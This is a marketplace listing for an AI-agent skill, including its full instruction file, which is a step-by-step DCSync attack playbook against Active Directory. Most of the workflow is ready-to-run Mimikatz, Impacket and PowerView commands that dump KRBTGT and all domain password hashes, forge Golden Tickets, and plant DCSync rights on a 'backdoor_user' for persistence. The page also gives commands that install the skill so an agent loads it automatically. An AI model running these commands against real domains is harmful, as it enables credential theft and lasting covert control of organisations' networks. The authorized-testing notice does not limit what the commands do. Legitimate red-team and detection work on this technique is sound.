Mmcp.market

conducting-domain-persistence-with-dcsync skill

by mukul975·mukul975/Anthropic-Cybersecurity-Skills·34k stars·Apache-2.0

Perform DCSync attacks by abusing MS-DRSR replication rights (DS-Replication-Get-Changes/-All) to impersonate a Domain Controller and extract KRBTGT, Domain Admin, and service account hashes for Golden Ticket forging, typically with Mimikatz. Use in authorized engagements after finding principals with replication rights, to establish long-term domain persistence, or to validate detections for replication abuse.

A100/100content scan

Is the conducting-domain-persistence-with-dcsync skill safe?

Clean: nothing in its files matched our rules. We read 8 files in the folder on 2026-09-28.

No findings.

Install the conducting-domain-persistence-with-dcsync skill

A skill is a folder. Copy it into your agent's skills folder and the agent loads it when the task matches its description.

git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git /tmp/Anthropic-Cybersecurity-Skills
mkdir -p ~/.claude/skills
cp -r /tmp/Anthropic-Cybersecurity-Skills/skills/conducting-domain-persistence-with-dcsync ~/.claude/skills/conducting-domain-persistence-with-dcsync
available in every project

In the Claude apps, zip the folder and upload it from the Skills settings. The folder on GitHub

The instructions your agent would load

SKILL.md as published, without the frontmatter. Read it on GitHub

Conducting Domain Persistence with DCSync

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Overview

DCSync is an attack technique that abuses the Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to impersonate a Domain Controller and request password data from the target DC. The attack was introduced by Benjamin Delpy (Mimikatz author) and Vincent Le Toux, leveraging the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights. Any principal (user or computer) with these rights can replicate password hashes for any account in the domain, including the KRBTGT account. With the KRBTGT hash, attackers can forge Golden Tickets for indefinite domain persistence. DCSync is categorized as MITRE ATT&CK T1003.006 and is a critical post-exploitation technique used by APT groups including APT28 (Fancy Bear), APT29 (Cozy Bear), and FIN6.

When to Use

  • When conducting security assessments that involve conducting domain persistence with dcsync
  • When following incident response procedures for related security events
  • When performing scheduled security testing or auditing activities
  • When validating security controls through hands-on testing

Prerequisites

  • Familiarity with red teaming concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

Objectives

  • Identify accounts with DCSync (replication) rights in Active Directory
  • Perform DCSync using Mimikatz or Impacket's secretsdump.py
  • Extract the KRBTGT account hash for Golden Ticket creation
  • Dump all domain user password hashes for credential analysis
  • Forge Golden Tickets for persistent domain access
  • Grant DCSync rights to a controlled account for alternative persistence
  • Document the attack chain and persistence mechanisms

MITRE ATT&CK Mapping

  • T1003.006 - OS Credential Dumping: DCSync
  • T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
  • T1222.001 - File and Directory Permissions Modification: Windows
  • T1098 - Account Manipulation
  • T1078.002 - Valid Accounts: Domain Accounts

Workflow

Phase 1: Identify Accounts with DCSync Rights

  1. Enumerate principals with replication rights:
# Using PowerView
   Get-DomainObjectAcl -SearchBase "DC=domain,DC=local" -ResolveGUIDs |
     Where-Object { ($_.ObjectAceType -match 'Replicating') -and
                    ($_.ActiveDirectoryRights -match 'ExtendedRight') } |
     Select-Object SecurityIdentifier, ObjectAceType

   # Using BloodHound Cypher query
   MATCH (u)-[:DCSync|GetChanges|GetChangesAll*1..]->(d:Domain)
   RETURN u.name, d.name
  1. Using Impacket's FindDelegation or custom LDAP query:
# Check with Impacket
   findDelegation.py domain.local/user:'Password123' -dc-ip 10.10.10.1
  1. Default accounts with DCSync rights:
  • Domain Admins
  • Enterprise Admins
  • Domain Controllers group
  • SYSTEM on Domain Controllers

Phase 2: DCSync Credential Extraction

  1. Using Mimikatz (Windows):
# Dump specific account (KRBTGT for Golden Ticket)
   mimikatz.exe "lsadump::dcsync /domain:domain.local /user:krbtgt"

   # Dump Domain Admin
   mimikatz.exe "lsadump::dcsync /domain:domain.local /user:administrator"

   # Dump all domain accounts
   mimikatz.exe "lsadump::dcsync /domain:domain.local /all /csv"
  1. Using Impacket secretsdump.py (Linux):
# Dump all credentials
   secretsdump.py domain.local/admin:'Password123'@10.10.10.1

   # Dump specific user
   secretsdump.py -just-dc-user krbtgt domain.local/admin:'Password123'@10.10.10.1

   # Dump only NTLM hashes (no Kerberos keys)
   secretsdump.py -just-dc-ntlm domain.local/admin:'Password123'@10.10.10.1

   # Using Kerberos authentication
   export KRB5CCNAME=admin.ccache
   secretsdump.py -k -no-pass domain.local/admin@DC01.domain.local

Phase 3: Golden Ticket Creation

  1. Using Mimikatz with extracted KRBTGT hash:
# Create Golden Ticket
   mimikatz.exe "kerberos::golden /user:administrator /domain:domain.local \
     /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \
     /krbtgt:<krbtgt_ntlm_hash> /ptt"

   # Create with specific group memberships
   mimikatz.exe "kerberos::golden /user:fakeadmin /domain:domain.local \
     /sid:S-1-5-21-XXXXXXXXXX \
     /krbtgt:<krbtgt_ntlm_hash> \
     /groups:512,513,518,519,520 /ptt"
  1. Using Impacket ticketer.py (Linux):
# Create Golden Ticket
   ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid S-1-5-21-XXXXXXXXXX \
     -domain domain.local administrator

   # Use the ticket
   export KRB5CCNAME=administrator.ccache
   psexec.py -k -no-pass domain.local/administrator@DC01.domain.local

Phase 4: Persistence via DCSync Rights

  1. Grant DCSync rights to a controlled account for persistence:
# Using PowerView - Add DS-Replication-Get-Changes-All rights
   Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" \
     -PrincipalIdentity backdoor_user -Rights DCSync

   # Verify rights were added
   Get-DomainObjectAcl -SearchBase "DC=domain,DC=local" -ResolveGUIDs |
     Where-Object { $_.SecurityIdentifier -match "backdoor_user_SID" }
  1. Using ntlmrelayx.py for automated DCSync rights escalation:
# Relay authentication to add DCSync rights
   ntlmrelayx.py -t ldap://DC01.domain.local --escalate-user backdoor_user

Tools and Resources

Critical Hashes to Extract

Detection Signatures

Validation Criteria

  • [ ] Accounts with DCSync rights enumerated
  • [ ] KRBTGT hash extracted via DCSync
  • [ ] All domain credentials dumped successfully
  • [ ] Golden Ticket forged and validated for DA access
  • [ ] DCSync rights persistence mechanism established (if in scope)
  • [ ] Access to Domain Controller validated with Golden Ticket
  • [ ] Evidence documented with hash values and timestamps
  • [ ] Remediation recommendations provided (double KRBTGT reset, ACL audit)

More skills from mukul975/Anthropic-Cybersecurity-Skills

  • Aabusing-dpapi-for-credential-accessExtract and decrypt Windows DPAPI-protected secrets (Credential Manager, browser logins/cookies, Wi-Fi credentials, KeePass keys) online or offline using SharpDPAPI, SharpChrome, Mimikatz, or Impacket's dpapi.py, including domain-wide decryption via the DPAPI backup key. Use during authorized red-team credential-access engagements after gaining a foothold or when triaging DPAPI blobs pulled from a host.
  • Aabusing-shadow-credentials-for-privescTake over Active Directory accounts by writing attacker-controlled public keys to msDS-KeyCredentialLink (Shadow Credentials) with pyWhisker, Whisker, or Certipy, then authenticate via PKINIT to recover the target's NT hash without a password reset. Use when BloodHound shows GenericWrite/GenericAll/AddKeyCredentialLink over a target, as a stealthier alternative to ForceChangePassword, during authorized red-team engagements.
  • Aachieving-cmmc-level-2-compliancePrepare a defense-contractor environment for CMMC Level 2 certification: scope CUI and FCI, implement the 110 NIST SP 800-171 Rev 2 security requirements across 14 families, compute the SPRS score with the DoD Assessment Methodology, manage a compliant POA&M, and ready the organization for a C3PAO assessment. Use when an organization handles Controlled Unclassified Information (CUI) under a DoD contract, when a contract carries DFARS clause 252.204-7012/7019/7020/7021, when preparing for or responding to a CMMC assessment, when computing or improving an SPRS score, when building a System Security Plan or POA&M for 800-171, or when scoping which systems are in the CUI boundary. Keywords: CMMC, CMMC Level 2, NIST 800-171, SP 800-171 Rev 2, CUI, FCI, SPRS, DFARS 7012, C3PAO, POA&M, System Security Plan, DoD Assessment Methodology, 110 controls, defense industrial base, DIB, FedRAMP equivalency.
  • Aacquiring-disk-image-with-dd-and-dcflddCreate forensically sound bit-for-bit disk images with dd or dcfldd on a Linux forensic workstation, preserving evidence integrity through hash verification (MD5/SHA) during acquisition. Use when imaging a suspect drive, USB device, or memory card for investigation, preserving volatile disk evidence during incident response, or producing a verified copy for legal or law-enforcement proceedings before any destructive analysis.
  • Aanalyzing-active-directory-acl-abuseDetect dangerous ACL misconfigurations in Active Directory using ldap3
  • Aanalyzing-android-malware-with-apktoolPerform static analysis of Android APK malware using apktool for resource decompilation, jadx for Java source recovery, and androguard for manifest inspection, dangerous permission-combination detection, and identification of obfuscated code, dynamic code loading, and reflection-based API calls. Use to statically triage a suspicious APK without executing it or to build mobile malware detection rules.
  • Danalyzing-api-gateway-access-logs'Parses API Gateway access logs (AWS API Gateway, Kong, Nginx) to detect
  • Aanalyzing-apt-group-with-mitre-navigatorQuery ATT&CK data with attackcti, mitreattack-python, and stix2, then build MITRE ATT&CK Navigator layers and multi-layer heatmap overlays mapping one or more APT groups' TTPs for detection-gap analysis. Use to compare threat-actor technique coverage, find gaps in detection engineering, or produce Navigator visualizations for threat-intel reporting.
  • Aanalyzing-azure-activity-logs-for-threats'Queries Azure Monitor activity logs and sign-in logs via azure-monitor-query
  • Aanalyzing-bootkit-and-rootkit-samples'Analyzes bootkit and advanced rootkit malware infecting the Master
  • Aanalyzing-browser-forensics-with-hindsightParse Chromium-based browser databases with Hindsight to extract and correlate browsing history, downloads, cookies, cached content, autofill data, saved passwords, and extensions from Chrome, Edge, Brave, Opera, and Vivaldi into a unified timeline (XLSX, JSON, or SQLite output). Use during incident response, insider-threat investigations, or criminal cases when you need to reconstruct a user's web activity from a browser profile.
  • Aanalyzing-campaign-attribution-evidenceSystematically evaluate cyber-campaign evidence to attribute an operation to a threat actor, using the Diamond Model and Analysis of Competing Hypotheses (ACH) to weigh infrastructure overlaps, TTP consistency, malware code similarity, and timing/language artifacts into confidence-weighted attribution assessments. Use when an incident investigation needs a defensible attribution confidence level.

All agent skills → · MCP servers